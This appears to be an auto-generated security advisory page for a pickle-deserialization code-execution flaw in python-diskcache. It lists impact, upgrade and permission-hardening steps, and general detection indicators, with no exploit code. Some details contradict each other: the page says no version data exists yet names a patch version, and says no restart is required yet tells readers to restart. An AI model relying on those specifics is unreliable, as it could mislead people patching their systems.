CVE-2025-69872
📋 TL;DR
This vulnerability in DiskCache (python-diskcache) allows arbitrary code execution when an attacker with write access to the cache directory injects malicious pickle data that gets deserialized by a victim application. All applications using python-diskcache versions through 5.6.3 with default pickle serialization are affected.
💻 Affected Systems
- python-diskcache (DiskCache)
⚠️ Manual Verification Required
This CVE does not have specific version information in our database, so automatic vulnerability detection cannot determine if your system is affected.
Why? The CVE database entry doesn't specify which versions are vulnerable (no version ranges provided by the vendor/NVD).
🔒 Custom verification scripts are available for registered users. Sign up free to download automated test scripts.
- Review the CVE details at NVD
- Check vendor security advisories for your specific version
- Test if the vulnerability is exploitable in your environment
- Consider updating to the latest version as a precaution
⚠️ Risk & Real-World Impact
Worst Case
Full system compromise with attacker gaining the same privileges as the application process, potentially leading to data theft, lateral movement, or ransomware deployment.
Likely Case
Local privilege escalation or remote code execution in multi-user systems where cache directories are shared or accessible via web applications.
If Mitigated
Limited impact if cache directories are properly secured with strict file permissions and network isolation.
🎯 Exploit Status
Exploitation requires write access to cache directory and victim application reading from cache. No authentication bypass needed beyond directory access.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 5.6.4 or later
Vendor Advisory: https://github.com/grantjenks/python-diskcache
Restart Required: No
Instructions:
1. Upgrade python-diskcache: pip install --upgrade diskcache
2. Verify version: python -c "import diskcache; print(diskcache.__version__)"
3. Restart affected applications to load new version.
🔧 Temporary Workarounds
Use JSON serializer instead of pickle
allConfigure DiskCache to use JSON serializer which is not vulnerable to deserialization attacks
from diskcache import Cache
cache = Cache(serializer='json')
Secure cache directory permissions
Linux/UnixRestrict write access to cache directory to only trusted users/processes
chmod 700 /path/to/cache
chown appuser:appgroup /path/to/cache
🧯 If You Can't Patch
- Implement strict file permissions on cache directories (read/write only for application user)
- Use application-level authentication and authorization to control cache access
- Monitor cache directory for unauthorized file modifications
- Consider using memory cache instead of disk cache if feasible
🔍 How to Verify
Check if Vulnerable:
Check if using python-diskcache ≤5.6.3 and default pickle serializationCheck Version:
python -c "import diskcache; print(diskcache.__version__)"Verify Fix Applied:
Verify python-diskcache version is ≥5.6.4 and cache uses non-pickle serializer or has secure configuration📡 Detection & Monitoring
Log Indicators:
- Unexpected Python process spawning
- Suspicious file writes to cache directory
- Pickle deserialization errors in application logs
Network Indicators:
- Unusual outbound connections from application processes
- Command and control traffic patterns
SIEM Query:
Process creation where parent process is Python application AND command line contains suspicious patterns